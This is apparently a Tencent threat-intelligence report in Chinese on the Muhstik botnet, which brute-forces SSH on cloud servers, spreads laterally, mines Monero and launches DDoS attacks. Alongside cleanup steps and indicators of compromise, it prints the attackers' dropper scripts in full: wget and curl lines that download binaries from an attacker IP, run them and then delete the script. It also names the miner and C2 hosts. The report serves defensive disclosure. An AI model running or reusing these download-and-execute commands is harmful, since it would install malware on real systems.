感谢腾讯御见威胁情报中心来稿!
原文链接:https://mp.weixin.qq.com/s/ExBUifhDQTQEbU3sz7WNVA
腾讯安全威胁情报中心检测到大量源自境外IP及部分国内IP针对国内云服务器租户的攻击。攻击者通过SSH(22端口)爆破登陆服务器,然后执行恶意命令下载Muhstik僵尸网络木马,组建僵尸网络并控制失陷服务器执行SSH横向移动、下载门罗币挖矿木马和接受远程指令发起DDoS攻击。
一、概述
腾讯安全威胁情报中心检测到大量源自境外IP及部分国内IP针对国内云服务器租户的攻击。攻击者通过SSH(22端口)爆破登陆服务器,然后执行恶意命令下载Muhstik僵尸网络木马,组建僵尸网络并控制失陷服务器执行SSH横向移动、下载门罗币挖矿木马和接受远程指令发起DDoS攻击。
腾讯安全威胁情报中心经过用户授权,对此次攻击进行溯源分析,发现国内多家知名企业的云服务器均受到该僵尸网络攻击,目前已有上千台服务器沦陷受害。腾讯安全专家建议相关企业采取必要措施,拦截入侵者,恢复已失陷的系统。
腾讯安全系列产品已针对Muhstik僵尸网络采取应急响应措施,执行清单如下:
应用
场景 |
安全产品 | 解决方案 |
威
胁 情 报 |
腾讯T-Sec
威胁情报云查服务 (SaaS) |
1)Muhstik僵尸网络相关IOCs已入库。
各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics |
腾讯T-Sec
高级威胁追溯系统 |
1)Muhstik僵尸网络相关信息和情报已支持检索。
网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts |
|
云原生安全
防护 |
云防火墙
(Cloud Firewall,CFW) |
基于网络流量进行威胁检测与主动拦截,已支持:
1)Muhstik僵尸网络关联的IOCs已支持识别检测; 2)告警弱口令爆破行为; 3)已支持以下漏洞检测:JBOSS反序列化漏洞、WebLogic远程代码执行漏洞。 有关云防火墙的更多信息,可参考: |
腾讯T-Sec 主机安全
(Cloud Workload Protection,CWP) |
1)已支持查杀Muhstik僵尸网络相关木马程序;
2)告警弱口令爆破行为; 3)已支持以下漏洞检测:JBOSS反序列化漏洞、WebLogic远程代码执行漏洞 腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp |
|
腾讯T-Sec
漏洞扫描服务 (Vulnerability Scan Service,VSS) |
腾讯漏洞扫描服务已支持检测全网资产是否受Muhstik僵尸网络所使用的高危漏洞影响。
关于腾讯T-Sec漏洞扫描服务的更多信息,可参考:https://cloud.tencent.com/product/vss |
|
腾讯T-Sec 安全运营中心 | 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全、腾讯漏洞扫描服务等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。
关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html |
|
非云企业安全防护 | 腾讯T-Sec
高级威胁检测系统 (腾讯御界) |
1)已支持通过协议检测Muhstik僵尸网络木马与服务器的网络通信;
2)已支持以下漏洞利用的检测:WebLogic Fusion中间件远程代码执行漏洞、WebLogic远程代码执行漏洞CVE-2019-2725 关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta |
二、样本分析
腾讯T-Sec云防火墙检测到多例弱口令爆破攻击,告警信息显示源IP为98.172.225.26正通过22端口爆破攻击云服务器。
由于腾讯T-Sec云防火墙及时预警攻击流量,安全专家迅速采取针对性处置措施,云服务器租户未遭受损失。腾讯云防火墙(Cloud Firewall,CFW)是一款基于公有云环境下的 SaaS 化防火墙,主要为用户提供互联网边界的防护。在入侵防御功能中,支持威胁情报、基础防御、虚拟补丁三种防御模式。
通过爆破攻击记录进行分析发现,攻击源IP来自美国、德国、俄罗斯、意大利等多个国家,其中美国较多。攻击者对单个主机进行爆破登陆次数平均为100次左右。部分攻击源IP列表如下:
爆破攻击时使用的部分账号名为:root、oracle、postgres、git、test
爆破登陆成功后利用wget命令下载shell脚本http[:]//167.99.39.134/.x/1sh、http[:]//167.99.39.134/.x/2sh、http[:]//167.99.39.134/.x/3sh并执行。
1sh脚本代码如下:
wget http[:]//167.99.39.134/.x/pty1 -O ar/run/pty1; chmod +x ar/run/pty1; chmod 700 ar/run/pty1; ar/run/pty1 &
wget http[:]//167.99.39.134/.x/pty2 -O ar/run/pty2; chmod +x ar/run/pty2; chmod 700 ar/run/pty2; ar/run/pty2 &
wget http[:]//167.99.39.134/.x/pty5 -O ar/run/pty5; chmod +x ar/run/pty5; chmod 700 ar/run/pty5; ar/run/pty5 &
wget http[:]//167.99.39.134/.x/pty11 -O ar/run/pty11; chmod +x ar/run/pty11; chmod 700 ar/run/pty11; ar/run/pty11 &
wget http[:]//167.99.39.134/.x/pty3 -O pty3; chmod +x pty3 ; chmod 700 pty3 ; ./pty3 &
wget http[:]//167.99.39.134/.x/pty10 -O pty10; chmod +x pty10 ; chmod 700 pty10 ; ./pty10 &
wget http[:]//167.99.39.134/.x/pty4 -O pty4; chmod +x pty4 ; chmod 700 pty4 ; ./pty4 &
wget http[:]//167.99.39.134/.x/pty3 -O ar/tmp/pty3; chmod +x ar/tmp/pty3 ; chmod 700 ar/tmp/pty3 ; ar/tmp/pty3 &
wget http[:]//167.99.39.134/.x/pty3 -O ar/run/pty3; chmod +x ar/run/pty3; chmod 700 ar/run/pty3; ar/run/pty3 &
rm -rf ar/run/1sh
1sh有以下功能:
1、 wget下载pty1、pty2、pty5、pty11释放到/var/run/目录下,赋予可执行权限并启动;
2、 wget下载pty3、pty10、pty4到当前目录下,赋予可执行权限并启动;
3、 wget下载pty3到/var/tmp/和/var/run/目录下,赋予可执行权限并启动;
4、 删除脚本自身。
2sh脚本代码如下:
wget http[:]//167.99.39.134/.x/pty1 -O /tmp/pty1 ; chmod +x /tmp/pty1 ; chmod 700 /tmp/pty1 ; /tmp/pty1 ; cp /binsybox /tmp/loop0 ; cat /tmp/pty1 > /tmp/loop0 ; /tmp/loop0 &
wget http[:]//167.99.39.134/.x/pty2 -O /tmp/pty2 ; chmod +x /tmp/pty2 ; chmod 700 /tmp/pty2 ; /tmp/pty2 ; cp /binsybox /tmp/loop1 ; cat /tmp/pty2 > /tmp/loop1 ; /tmp/loop1 &
wget http[:]//167.99.39.134/.x/pty11 -O /tmp/pty11 ; chmod +x /tmp/pty11 ; chmod 700 /tmp/pty11 ; /tmp/pty11 ; cp /binsybox /tmp/loop1 ; cat /tmp/pty11 > /tmp/loop1 ; /tmp/loop1 &
wget http[:]//167.99.39.134/.x/pty10 -O /tmp/pty10 ; chmod +x /tmp/pty10 ; chmod 700 /tmp/pty10 ; /tmp/pty10 ; cp /binsybox /tmp/loop2 ; cat /tmp/pty10 > /tmp/loop2 ; /tmp/loop2 &
wget http[:]//167.99.39.134/.x/pty4 -O /tmp/pty4 ; chmod +x /tmp/pty4 ; chmod 700 /tmp/pty4 ; /tmp/pty4 ; cp /binsybox /tmp/loop3 ; cat /tmp/pty4 > /tmp/loop3 ; /tmp/loop3 &
wget http[:]//167.99.39.134/.x/pty5 -O /tmp/pty5 ; chmod +x /tmp/pty5 ; chmod 700 /tmp/pty5 ; /tmp/pty5 ; cp /binsybox /tmp/loop3 ; cat /tmp/pty5 > /tmp/loop4 ; /tmp/loop4 &
rm -rf /tmp/2sh
2sh有以下功能:
1、 wget下载pty1、pty2、pty11、pty10、pty4、pty5到/tmp/目录下,赋予可执行权限并启动;
2、 将下载的文件拷贝到/tmp/目录下,重命名为loop0、loop1(pty2和pty11)、loop2、loop3、loop4并启动;
3、 删除脚本自身。
3sh脚本代码如下:
curl http[:]//167.99.39.134/.x/pty10 -o pty10 ; chmod +x pty10 ; chmod 700 pty10 ; ./pty10
curl http[:]//167.99.39.134/.x/pty3 -o pty3; chmod +x pty3 ; chmod 700 pty3 ; ./pty3
curl http[:]//167.99.39.134/.x/pty4 -o pty4; chmod +x pty4 ; chmod 700 pty4 ; ./pty4
curl http[:]//167.99.39.134/.x/pty10 -o /tmp/pty10 ; chmod +x /tmp/pty10 ; chmod 700 /tmp/pty10 ; /tmp/pty10 &
curl http[:]//167.99.39.134/.x/pty1 -o /tmp/pty1; chmod +x /tmp/pty1; chmod 700 /tmp/pty1; /tmp/pty1 &
curl http[:]//167.99.39.134/.x/pty2 -o /tmp/pty2; chmod +x /tmp/pty2; chmod 700 /tmp/pty2; /tmp/pty2 &
curl http[:]//167.99.39.134/.x/pty5 -o /tmp/pty5; chmod +x /tmp/pty5; chmod 700 /tmp/pty5; /tmp/pty5 &
curl http[:]//167.99.39.134/.x/pty11 -o /tmp/pty11; chmod +x /tmp/pty11; chmod 700 /tmp/pty11; /tmp/pty11 &
3sh有以下功能:
1、 curl下载pty10、pty3、pty4到当前目录,赋予可执行权限并启动;
2、 curl下载pty10、pty1、pty2、pty5、pty11到/tmp/目录,赋予可执行权限并启动。
分析发现,pty*属于Muhstik僵尸网络Muhstik组件。Muhstik在2018年3月左右被发现,具有蠕虫式的自我传播能力,使用多个漏洞利用来感染Linux服务,如Weblogic、WordPress和Drupal。该僵尸网络还会感染IoT路由器,如GPON家用路由器、DD-WRT路由器和Tomato路由器等。
pty*运行后会将自身拷贝到以下目录,并将其安装为crontab定时任务,/etc/inittab系统启动项进行持久化。
/dev/shm/pty4
/var/tmp/pty4
/var/lock/pty4
/var/run/pty4
Muhstik感染设备后,会发送一个connect命令到IRC服务器,通过Connect命令中含有设备的昵称(nickname)来加入到信道中。然后服务器响应一个含有BotnetID的PING命令,受感染的设备会回复一个含有BotnetID的PONG。
一旦nickname构造好,并分配给受感染的客户端后,IRC服务器就会接受主机作为信道中的客户端,并发送一个MOTD (Message of the Day)给客户端。最后,受害者设备发送一个命令到加入名为ei的信道,通过该信道接收僵尸网络的控制命令。
muhstik.c2.list会向已感染僵尸系统bot发起指令,控制僵尸系统执行新的扫描、在已入侵网络中横向扩散、下载运行xmrig进行门罗币挖矿或对指定目标发起DDoS攻击。
Muhstik僵尸网络会在感染机器下载门罗币挖矿木马http[:]//167.99.39.134/xmra64到/tmp/xmra64或/[user]/xmra64目录下并启动挖矿。
三、安全建议:
腾讯安全专家建议企业Linux系统管理员及时修复高危漏洞,避免使用弱口令,以防服务器被远程攻击。可参考以下步骤手动检查、清除Muhstik僵尸网络病毒。
1.查找以下文件,kill其进程并删除文件:
(user为root、oracle、postgres、root、git、test其中之一)
/var/run/pty1
/var/run/pty2
/var/run/pty3
/var/run/pty5
/var/run/pty11
/home/[user]/pty3
/home/[user]/pty10
/home/[user]/pty4
/tmp/pyt1
/tmp/pyt2
/tmp/pyt3
/tmp/pyt4
/tmp/pyt5
/tmp/pyt10
/tmp/pyt11
/tmp/loop0
/tmp/loop1
/tmp/loop2
/tmp/loop3
/tmp/loop4
/tmp/xmra64
/home/[user]/xmra64
/dev/shm/pty4
/var/tmp/pty4
/var/lock/pty4
/var/run/pty4
2.crontab -l查看定时任务中是否包含以上pty文件相关内容,如有将其删除。
3.cat /etc/inittab查看Linux系统启动任务中是否包含以上pty文件相关内容,如有将其删除。
IOCs
IP
167.99.39.134
165.227.78.159
128.199.251.119
C2:
irc.de-zahlung.eu
irc.deutschland-zahlung.net
md5
1sh | 861c40811b98780ce8eba0c572dfaa9b |
2sh | bfc90665de5c74c45488226a8999630b |
2sh | ca6d74719f063b9c79cb4d81d7299392 |
pty1 | 67a74bc4803338314e6d26bc49718b80 |
pty2 | c69da71d1082234abd89ee40f0058287 |
pty2 | 5ab7ab3742014ad0ac3c24040f64850a |
pty3 | 6e1e7dfc55924c0eef1e92435bc1d7b2 |
pty3 | fd55671c226217e639278e874ecfdf06 |
pty4 | 53a62df6802cc71eea1bc7fdf4c479c4 |
pty4 | cac757d94276b3cd6b45f1717646f876 |
pty4 | 777379b60b69b63b1b422e0c62a35f3c |
pty5 | 3f7661a3cb69263d3075469e103a427e |
pty5 | 09cab3119e981ee5a2a8cf074374f1df |
pty10 | a40149fc7c41ad2a3a9692d162cadc38 |
pty10 | da7f06994e66978dd03d38ffa3cbd0ce |
pty11 | abb24288853b8add817e646d5b49eb0b |
pty11 | 5414080102e9665adc1b2fd71f878ec7 |
xmra64 | 497f4e24464a748c52f92de1fba33551 |
ntg | 18a96b7547763150bceea0cb465070a7 |
i586 | 4b048a7051936ff3d6f90889768462dd |
arion | c1dfbab66d62f5b4c7d6e0cc6ce61e57 |
URL
http[:]//167.99.39.134/.x/1sh
http[:]//167.99.39.134/.x/2sh
http[:]//167.99.39.134/.x/3sh
http[:]//167.99.39.134/.x/pty10
http[:]//167.99.39.134/.x/pty3
http[:]//167.99.39.134/.x/pty4
http[:]//167.99.39.134/.x/pty1
http[:]//167.99.39.134/.x/pty2
http[:]//167.99.39.134/.x/pty5
http[:]//167.99.39.134/.x/pty11
http[:]//167.99.39.134/xmra64
http[:]//ntg.deutschland-zahlung.net/ntg
http[:]//165.227.78.159/.p/i586
http[:]//128.199.251.119/.x/arion
请登录后发表评论
注册